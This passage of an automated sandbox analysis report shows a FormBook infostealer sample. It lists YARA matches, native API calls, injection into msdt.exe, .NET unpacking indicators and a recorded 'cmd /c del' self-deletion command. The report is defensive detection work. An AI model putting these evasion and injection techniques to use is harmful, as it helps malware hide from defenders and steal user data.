          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.SKM_C36821010708320.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.SKM_C36821010708320.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.SKM_C36821010708320.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_0041A050 NtClose,2_2_0041A050
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_0041A100 NtAllocateVirtualMemory,2_2_0041A100
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_00419F20 NtCreateFile,2_2_00419F20
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_00419FD0 NtReadFile,2_2_00419FD0
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_0041A0FA NtAllocateVirtualMemory,2_2_0041A0FA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009540 NtReadFile,LdrInitializeThunk,6_2_05009540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050095D0 NtClose,LdrInitializeThunk,6_2_050095D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009710 NtQueryInformationToken,LdrInitializeThunk,6_2_05009710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009780 NtMapViewOfSection,LdrInitializeThunk,6_2_05009780
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009FE0 NtCreateMutant,LdrInitializeThunk,6_2_05009FE0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009650 NtQueryValueKey,LdrInitializeThunk,6_2_05009650
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009660 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_05009660
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050096D0 NtCreateKey,LdrInitializeThunk,6_2_050096D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050096E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_050096E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009910 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_05009910
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050099A0 NtCreateSection,LdrInitializeThunk,6_2_050099A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009840 NtDelayExecution,LdrInitializeThunk,6_2_05009840
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009860 NtQuerySystemInformation,LdrInitializeThunk,6_2_05009860
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009A50 NtCreateFile,LdrInitializeThunk,6_2_05009A50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009520 NtWaitForSingleObject,6_2_05009520
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0500AD30 NtSetContextThread,6_2_0500AD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009560 NtWriteFile,6_2_05009560
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050095F0 NtQueryInformationFile,6_2_050095F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0500A710 NtOpenProcessToken,6_2_0500A710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009730 NtQueryVirtualMemory,6_2_05009730
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009760 NtOpenProcess,6_2_05009760
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0500A770 NtOpenThread,6_2_0500A770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009770 NtSetInformationFile,6_2_05009770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050097A0 NtUnmapViewOfSection,6_2_050097A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009610 NtEnumerateValueKey,6_2_05009610
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009670 NtQueryInformationProcess,6_2_05009670
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009950 NtQueueApcThread,6_2_05009950
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050099D0 NtCreateProcessEx,6_2_050099D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009820 NtEnumerateKey,6_2_05009820
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0500B040 NtSuspendThread,6_2_0500B040
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050098A0 NtWriteVirtualMemory,6_2_050098A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050098F0 NtReadVirtualMemory,6_2_050098F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009B00 NtSetValueKey,6_2_05009B00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0500A3B0 NtGetContextThread,6_2_0500A3B0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009A00 NtProtectVirtualMemory,6_2_05009A00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009A10 NtQuerySection,6_2_05009A10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009A20 NtResumeThread,6_2_05009A20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009A80 NtOpenDirectoryObject,6_2_05009A80
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0301A100 NtAllocateVirtualMemory,6_2_0301A100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0301A050 NtClose,6_2_0301A050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_03019F20 NtCreateFile,6_2_03019F20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_03019FD0 NtReadFile,6_2_03019FD0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0301A0FA NtAllocateVirtualMemory,6_2_0301A0FA
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 0_2_009D90130_2_009D9013
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 0_2_0524C62C0_2_0524C62C
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 0_2_0524E8A00_2_0524E8A0
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 0_2_0524E8900_2_0524E890
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 0_2_060C99A00_2_060C99A0
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 0_2_060C0D700_2_060C0D70
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 0_2_060C0D800_2_060C0D80
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 0_2_060C0B180_2_060C0B18
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 0_2_060C0B280_2_060C0B28
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_0041D28D2_2_0041D28D
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_0041E4072_2_0041E407
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_0041D53D2_2_0041D53D
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_00409E2B2_2_00409E2B
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_00409E302_2_00409E30
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_00B590132_2_00B59013
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05092D076_2_05092D07
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05091D556_2_05091D55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050925DD6_2_050925DD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD841F6_2_04FD841F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FDD5E06_2_04FDD5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0508D4666_2_0508D466
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF25816_2_04FF2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FC0D206_2_04FC0D20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FE6E306_2_04FE6E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05091FF16_2_05091FF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0508D6166_2_0508D616
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05092EF76_2_05092EF7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF20A06_2_04FF20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FDB0906_2_04FDB090
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050810026_2_05081002
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050920A86_2_050920A8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FE41206_2_04FE4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050928EC6_2_050928EC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FCF9006_2_04FCF900
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05092B286_2_05092B28
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0508DBD26_2_0508DBD2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FFEBB06_2_04FFEBB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050922AE6_2_050922AE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0301D28D6_2_0301D28D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_030010306_2_03001030
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_03002FB06_2_03002FB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_03009E2B6_2_03009E2B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_03009E306_2_03009E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_03002D906_2_03002D90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0301E4076_2_0301E407
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 04FCB150 appears 35 times
          Source: SKM_C36821010708320.exe, 00000000.00000002.238052275.0000000006050000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePositiveSign.dll< vs SKM_C36821010708320.exe
          Source: SKM_C36821010708320.exe, 00000000.00000000.216347265.0000000000A92000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameServerObjectTerminatorSink.exe@ vs SKM_C36821010708320.exe
          Source: SKM_C36821010708320.exe, 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSoapName.dll2 vs SKM_C36821010708320.exe
          Source: SKM_C36821010708320.exe, 00000002.00000000.230956986.0000000000C12000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameServerObjectTerminatorSink.exe@ vs SKM_C36821010708320.exe
          Source: SKM_C36821010708320.exe, 00000002.00000002.272414307.000000000179F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SKM_C36821010708320.exe
          Source: SKM_C36821010708320.exe, 00000002.00000002.272752865.00000000032E0000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs SKM_C36821010708320.exe
          Source: SKM_C36821010708320.exeBinary or memory string: OriginalFilenameServerObjectTerminatorSink.exe@ vs SKM_C36821010708320.exe
          Source: SKM_C36821010708320.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.SKM_C36821010708320.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.SKM_C36821010708320.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@5/5
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SKM_C36821010708320.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4548:120:WilError_01
          Source: SKM_C36821010708320.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: SKM_C36821010708320.exeReversingLabs: Detection: 28%
          Source: unknownProcess created: C:\Users\user\Desktop\SKM_C36821010708320.exe 'C:\Users\user\Desktop\SKM_C36821010708320.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\SKM_C36821010708320.exe C:\Users\user\Desktop\SKM_C36821010708320.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SKM_C36821010708320.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess created: C:\Users\user\Desktop\SKM_C36821010708320.exe C:\Users\user\Desktop\SKM_C36821010708320.exeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SKM_C36821010708320.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: SKM_C36821010708320.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: SKM_C36821010708320.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: SKM_C36821010708320.exe, 00000002.00000002.272752865.00000000032E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: SKM_C36821010708320.exe, 00000002.00000002.272414307.000000000179F000.00000040.00000001.sdmp, msdt.exe, 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: SKM_C36821010708320.exe, 00000002.00000002.272414307.000000000179F000.00000040.00000001.sdmp, msdt.exe
          Source: Binary string: msdt.pdb source: SKM_C36821010708320.exe, 00000002.00000002.272752865.00000000032E0000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: SKM_C36821010708320.exe, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.SKM_C36821010708320.exe.9d0000.0.unpack, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.2.SKM_C36821010708320.exe.b50000.1.unpack, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.SKM_C36821010708320.exe.b50000.0.unpack, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_0041D075 push eax; ret 2_2_0041D0C8
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_0041D0C2 push eax; ret 2_2_0041D0C8
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_0041D0CB push eax; ret 2_2_0041D132
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_00408171 pushfd ; retf 2_2_00408172
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_0041D12C push eax; ret 2_2_0041D132
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_00417206 push es; iretd 2_2_0041720C
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_00406C46 push edi; iretd 2_2_00406C4E
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_00417F59 push edi; retf 2_2_00417F5F
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_004167AE push 0000003Ah; retf 2_2_004167B2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0501D0D1 push ecx; ret 6_2_0501D0E4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_03017206 push es; iretd 6_2_0301720C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0301D12C push eax; ret 6_2_0301D132
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_03008171 pushfd ; retf 6_2_03008172
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0301D075 push eax; ret 6_2_0301D0C8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0301D0C2 push eax; ret 6_2_0301D0C8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0301D0CB push eax; ret 6_2_0301D132
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_03017F59 push edi; retf 6_2_03017F5F
